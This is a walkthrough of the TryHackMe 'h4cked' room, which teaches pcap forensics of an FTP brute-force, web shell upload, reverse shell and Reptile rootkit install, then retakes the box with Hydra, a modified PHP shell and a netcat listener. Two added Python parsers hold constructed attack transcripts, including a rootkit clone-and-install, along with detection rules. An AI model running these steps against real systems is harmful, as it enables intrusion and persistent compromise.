h4cked | TryHackMe Walkthrough
TryHackMe “h4cked” ( https://tryhackme.com/room/h4cked ) is a simple CTF room that combines blue and red teaming: first you analyze a network traffic capture to reconstruct what an adversary did, then you hack your way back into the box to regain root access, because the adversary has changed some of its configuration.
Oh no! We’ve been hacked!
First of all, fire up your pentesting machine and connect to the TryHackMe network over OpenVPN. Then download the pcap file the room provides and open it in Wireshark. Let us go through the questions one by one.
1. The attacker is trying to log into a specific service. What service is this?
When analyzing the pcap file we can easily see that the attacker is trying to log into an FTP service: applying the display filter “ftp” shows a long run of FTP requests and responses on port 21, as shown below.
2. There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?
A simple Google search shows that they are asking about the well-known THC-Hydra tool (usually just called Hydra), a network login brute-forcer written by van Hauser.
3. The attacker is trying to log on with a specific username. What is the username?
Analyze the pcap file with the “ftp.request” display filter. You will see many USER requests, all for the name Jenny, as shown below.
4. What is the user’s password?
Refine the above “ftp.request” filter further, or look at the server side with “ftp.response.code == 530” for failed and “ftp.response.code == 230” for successful logins. There are many failed login attempts and exactly one successful one, as shown below; the PASS request immediately before the 230 reply contains the password.
5. What is the current FTP working directory after the attacker logged in?
Click on any packet after the successful login, right-click it and choose “Follow TCP Stream”. The attacker ran the “PWD” command, and the server’s 257 reply shows the current working directory as “/var/www/html”. That is the web root, so anything uploaded here is reachable over HTTP.
6. The attacker uploaded a backdoor. What is the backdoor’s filename?
The same TCP stream shows a “STOR shell.php” command (STOR is the FTP upload command), so the backdoor’s filename is “shell.php”.
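To pull the same answers out of the capture without clicking through Wireshark, here is an added Python example (mine, not from the room or the original post) that parses an FTP control-channel transcript in the form “Follow TCP Stream” presents it: it pairs every PASS with the reply it got, records the credential that earned a 230, takes the directory from the 257 reply to PWD, and lists the filenames handed to STOR. The transcript embedded below is constructed for the example (the passwords and the number of attempts are made up); to produce a real one, save the stream from Wireshark’s Follow TCP Stream dialog or run tshark with the “ftp” filter over the pcap.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed transcript in the shape Wireshark's "Follow TCP Stream" shows for
# an FTP control channel (client commands and server replies interleaved).
# The passwords and the number of attempts are made up for this example; they
# are not taken from the room's pcap.
SAMPLE_STREAM = """\
220 (vsFTPd 3.0.3)
USER jenny
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS qwerty
530 Login incorrect.
USER jenny
331 Please specify the password.
PASS letmein
230 Login successful.
SYST
215 UNIX Type: L8
PWD
257 "/var/www/html" is the current directory
TYPE I
200 Switching to Binary mode.
STOR shell.php
150 Ok to send data.
226 Transfer complete.
"""

REPLY_RE = re.compile(r"^(\d{3})[ -](.*)$")      # "530 Login incorrect."
QUOTED_RE = re.compile(r'"((?:[^"]|"")*)"')      # RFC 959 quoted pathname in a 257 reply


@dataclass
class FtpSession:
    attempts: List[Tuple[str, str, int]] = field(default_factory=list)  # (user, password, reply code)
    success: Optional[Tuple[str, str]] = None                          # first credential that got 230
    cwd: Optional[str] = None                                          # directory reported by PWD
    uploads: List[str] = field(default_factory=list)                   # filenames given to STOR


def parse_ftp_stream(stream: str) -> FtpSession:
    """Walk the control channel line by line.  Each PASS is paired with the
    server's next reply so every login attempt gets its outcome, a 257 reply
    yields the working directory, and a STOR acknowledged with 150/125 counts
    as an upload."""
    s = FtpSession()
    user: Optional[str] = None
    pending_pass: Optional[str] = None
    pending_stor: Optional[str] = None
    for raw in stream.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = REPLY_RE.match(line)
        if m:                                   # a server reply
            code, text = int(m.group(1)), m.group(2)
            if pending_pass is not None:        # outcome of the last PASS
                s.attempts.append((user or "", pending_pass, code))
                if code == 230 and s.success is None:
                    s.success = (user or "", pending_pass)
                pending_pass = None
            elif code == 257:                   # PWD result
                q = QUOTED_RE.search(text)
                if q:
                    s.cwd = q.group(1).replace('""', '"')
            elif pending_stor is not None and code in (125, 150):
                s.uploads.append(pending_stor)
                pending_stor = None
            continue
        cmd, _, arg = line.partition(" ")       # a client command
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
        elif cmd == "PASS":
            pending_pass = arg
        elif cmd == "STOR":
            pending_stor = arg
    return s


def failed_attempts(s: FtpSession) -> List[Tuple[str, str, int]]:
    """Login attempts the server rejected (any reply other than 230)."""
    return [a for a in s.attempts if a[2] != 230]


def looks_like_bruteforce(s: FtpSession, threshold: int = 5) -> bool:
    """Hydra-style guessing shows up as a burst of rejected PASS commands;
    the threshold is a tunable assumption, not a standard."""
    return len(failed_attempts(s)) >= threshold


if __name__ == "__main__":
    session = parse_ftp_stream(SAMPLE_STREAM)
    print("failed attempts:", len(failed_attempts(session)))
    print("successful login:", session.success)
    print("working directory:", session.cwd)
    print("uploads:", session.uploads)
```

The same parser works on the real stream because it keys only on the reply codes (230, 530, 257, 150) and the USER/PASS/STOR verbs, which are fixed by RFC 959 rather than by vsftpd’s wording.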
7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
As the hint suggests, apply the “ftp-data” filter and follow the TCP stream of the upload. The entire PHP file is visible there, and the URL is written inside the file; you will find it easily when scrolling.
8. Which command did the attacker manually execute after getting a reverse shell?
Select a packet from the reverse-shell connection and follow its TCP stream. Everything the attacker typed after getting the reverse shell is there. The first manually executed command is “whoami”.
9. What is the computer’s hostname?
Looking closely at the same TCP stream, the very first lines (the banner the shell prints when it connects) describe the OS, hostname, etc. As the OS is Linux, the hostname is “wir3”.
10. Which command did the attacker execute to spawn a new TTY shell?
Anyone who has worked with reverse shells knows that the first shell you get is a non-interactive, unstable one, and the usual way to upgrade it is a one-line Python command that spawns a PTY with pty.spawn. The attacker does exactly that, and the command is visible in the same TCP stream.
11. Which command was executed to gain a root shell?
Further down the same stream we can see that the attacker has root privileges through Jenny’s account: he switches to Jenny and then gains a root shell with “sudo su”.
12. The attacker downloaded something from GitHub. What is the name of the GitHub project?
We can see a “git clone” done by the attacker; the name of the GitHub project is “Reptile”.
13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
If you don’t know what Reptile is, Google is your best friend: it is a rootkit (a Linux kernel-module rootkit, which is why it is so hard to detect from inside the compromised system).
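The reverse-shell stream answers questions 8 through 13 in one read, so here is an added Python example (mine, not the room’s or the original post’s) that triages such a transcript automatically: it pulls out the commands typed at a prompt, tags them (recon, TTY upgrade, privilege escalation, downloads, installs), takes the hostname from the uname banner and names any Git project that was cloned. The transcript, hostname, kernel string and password embedded below are constructed for the example, and the tagging rules are an illustrative starting set, not a complete catalogue of attacker tradecraft.

```python
import re
from typing import List, Optional, Set, Tuple

# Constructed transcript of a reverse-shell TCP stream, in the shape Wireshark's
# "Follow TCP Stream" shows it: the banner the shell prints on connect, then
# prompts, the commands typed after them and their output.  Hostname, kernel
# string and password are made up for this example, not copied from the pcap.
SAMPLE_SESSION = """\
Linux example-host 4.15.0-136-generic #140-Ubuntu SMP x86_64 GNU/Linux
 12:34:56 up  1:02,  0 users,  load average: 0.00, 0.01, 0.05
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@example-host:/$ su jenny
Password: hunter2
jenny@example-host:/$ sudo -l
User jenny may run the following commands on example-host:
    (ALL : ALL) ALL
jenny@example-host:/$ sudo su
root@example-host:/# git clone https://github.com/f0rb1dd3n/Reptile.git
Cloning into 'Reptile'...
root@example-host:/# cd Reptile
root@example-host:/Reptile# ./setup.sh install
"""

# A bare "$ " prompt from the initial /bin/sh, or "user@host:path$ " / "#"
# after the PTY upgrade.  Group 1 is the host named in the prompt, group 2
# the command typed.
PROMPT_RE = re.compile(r"^(?:\$|[\w.-]+@([\w.-]+):\S*[#$])\s+(.*)$")
URL_RE = re.compile(r"https?://\S+")

# (tag, pattern) pairs matched against each command.  An illustrative set.
RULES = [
    ("recon", re.compile(r"^(whoami|id|uname|hostname|sudo -l|cat /etc/passwd)\b")),
    ("tty_spawn", re.compile(r"pty\.spawn|script\s+(-q\s+)?/dev/null|socat\b.*\bpty\b")),
    ("priv_esc", re.compile(r"^(sudo\s+(su|-i|-s|bash|sh)\b|su\b|usermod\s+-aG?\s+(sudo|wheel)\b)")),
    ("fetch", re.compile(r"^(git\s+clone|wget|curl)\b")),
    ("install", re.compile(r"setup\.sh|make\s+install|\binsmod\b|\.ko\b")),
]


def extract_commands(session: str) -> List[str]:
    """Commands typed at a prompt, in order; output lines carry no prompt and
    are skipped."""
    cmds = []
    for line in session.splitlines():
        m = PROMPT_RE.match(line)
        if m and m.group(2).strip():
            cmds.append(m.group(2).strip())
    return cmds


def classify(command: str) -> Set[str]:
    """Tags from RULES that apply to one command (possibly none)."""
    return {tag for tag, rx in RULES if rx.search(command)}


def banner_hostname(session: str) -> Optional[str]:
    """The hostname is the second word of the 'Linux <host> <kernel> ...'
    line that uname -a prints when the shell connects."""
    m = re.match(r"^Linux\s+(\S+)", session)
    return m.group(1) if m else None


def fetched_projects(commands: List[str]) -> List[str]:
    """Names of repositories or files pulled with git clone, wget or curl."""
    names = []
    for cmd in commands:
        if "fetch" not in classify(cmd):
            continue
        for url in URL_RE.findall(cmd):
            name = url.rstrip("/").rsplit("/", 1)[-1]
            names.append(name[:-4] if name.endswith(".git") else name)
    return names


def triage(session: str) -> List[Tuple[str, Set[str]]]:
    """Every typed command with its tags: the timeline an incident report needs."""
    return [(c, classify(c)) for c in extract_commands(session)]


if __name__ == "__main__":
    print("hostname:", banner_hostname(SAMPLE_SESSION))
    for cmd, tags in triage(SAMPLE_SESSION):
        print(f"{sorted(tags) or '-'}\t{cmd}")
    print("fetched:", fetched_projects(extract_commands(SAMPLE_SESSION)))
```

The prompt regex is the fragile part: it assumes the default bash prompt form after the PTY upgrade, so if the box uses a custom PS1 you will need to extend it, and anything the attacker ran as a one-liner after the prompt is still captured as a single command.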
Blue teaming part is over by this point. Now we have to regain access to the system.
Hack your way back into the machine
We are told that the attacker changed the user’s password. So our objective is to recover the new password, get back in, and escalate to root in order to read the flag. First, deploy the machine and copy its IP address.
1. Run Hydra (or any similar tool) on the FTP service. The attacker might not have chosen a complex password. You might get lucky if you use a common word list.
Fire up Hydra, the well-known online password brute-forcing tool, against the FTP service. With the rockyou.txt wordlist that ships with Kali and most pentesting distributions (/usr/share/wordlists/rockyou.txt), the FTP password falls within seconds.
Not a very careful attacker, is he?
So, let’s login to FTP using the above credentials.
So, we are now successfully logged in as Jenny.
2. Change the necessary values inside the web shell and upload it to the webserver.
We can see the attacker’s uploaded PHP shell in the FTP directory listing, as shown below. I downloaded it (with “get shell.php”) in order to make the necessary changes.
Now you need the IP of your own machine. You can view your IP configuration with the “ifconfig” (or “ip a”) command. Remember to use the VPN (tun0) IP, not your LAN address, since that is the only address the target can reach.
Copy that IP and paste it into the downloaded PHP shell as shown below, together with the port your listener will use. I am using the nano text editor to edit the shell; use whatever you prefer.
Now upload the shell to the FTP server with the “put” command. When uploading the shell I found that the server had timed out. If you encounter this issue, don’t panic; just connect to FTP again.
Server timeout error
Reconnecting and uploading the shell
When giving the “put” command, make sure to give the full path of the shell.php file. In my case it is in my home directory, from which I started the FTP client, so I did not need to give the full path.
3. Create a listener on the designated port on your attacker machine. Execute the web shell by visiting the .php file on the targeted web server.
At this point it is obvious that we need a listener to catch the connection from the shell we uploaded, on the same port we wrote into the shell. So I am starting a Netcat listener on port 80 (listening on a port below 1024 requires root).
Now we have to visit the web application so that the shell we uploaded gets executed. Browse to the machine IP and you will see an interface like the one below.
To execute our shell we need to request its path on the web server. Since we uploaded it into /var/www/html, the web root, the URL is simply “http://<machineIP>/shell.php”.
As soon as that URL is requested, we get a reverse shell on Netcat.
As you can see, this shell is not stable, so we use the usual Python PTY one-liner to upgrade it.
4. Become root!
For now I am “www-data”, which has no root privileges. We know that Jenny has root (sudo) privileges on the machine, so let us switch to Jenny with her recovered password and then become root. It is as simple as follows.
VOILA! We get a root shell without much effort.
5. Read the flag.txt file inside the Reptile directory.
This is our objective, isn’t it? Obtaining the flag! As we are in a root shell, we can simply navigate to the Reptile directory inside root’s home (/root/Reptile) and read flag.txt.
So, this is it! It was simple as that.
I would like to hear your thoughts about this too. Connect me on LinkedIn, Github.